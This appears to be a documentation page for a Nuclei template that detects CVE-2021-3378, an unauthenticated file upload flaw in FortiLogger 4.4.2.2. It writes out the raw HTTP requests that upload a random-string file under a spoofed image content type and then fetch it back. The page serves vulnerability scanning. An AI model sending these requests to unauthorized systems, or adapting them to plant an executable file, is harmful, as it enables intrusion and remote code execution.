FortiLogger 4.4.2.2 - Arbitrary File Upload
ID: CVE-2021-3378
Severity: critical
Author: dwisiswant0
Tags: cve,cve2021,fortilogger,fortigate,fortinet,packetstorm,fileupload,intrusive
Description
Section titled “Description”FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a “Content-Type: image/png” header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.
YAML Source
Section titled “YAML Source”id: CVE-2021-3378
info: name: FortiLogger 4.4.2.2 - Arbitrary File Upload author: dwisiswant0 severity: critical description: | FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp. impact: | Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of FortiLogger to mitigate this vulnerability. reference: - https://erberkan.github.io/2021/cve-2021-3378/ - https://github.com/erberkan/fortilogger_arbitrary_fileupload - http://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html - http://packetstormsecurity.com/files/161974/FortiLogger-Arbitrary-File-Upload.html - https://github.com/SYRTI/POC_to_review classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3378 cwe-id: CWE-434 epss-score: 0.46039 epss-percentile: 0.97333 cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: fortilogger product: fortilogger tags: cve,cve2021,fortilogger,fortigate,fortinet,packetstorm,fileupload,intrusive
http: - raw: - | POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS Accept: application/json Referer: {{BaseURL}} Connection: close X-Requested-With: XMLHttpRequest
------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="file"; filename="poc.txt" Content-Type: image/png
{{randstr}}
------WebKitFormBoundarySHHbUsfCoxlX1bpS - | GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body_2 words: - "{{randstr}}"
- type: word part: header words: - "text/plain" - "ASP.NET" condition: and
- type: status status: - 200# digest: 490a0046304402204c196f81344ce85ef71e98b25fbb58ad216106ec71e994fc448aa124c5b56f0502200d5a302d941fff7f46f73103fb9885b5e2ebb65d7a43cb62b9d2f9c37bfe03f4:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-3378.yaml"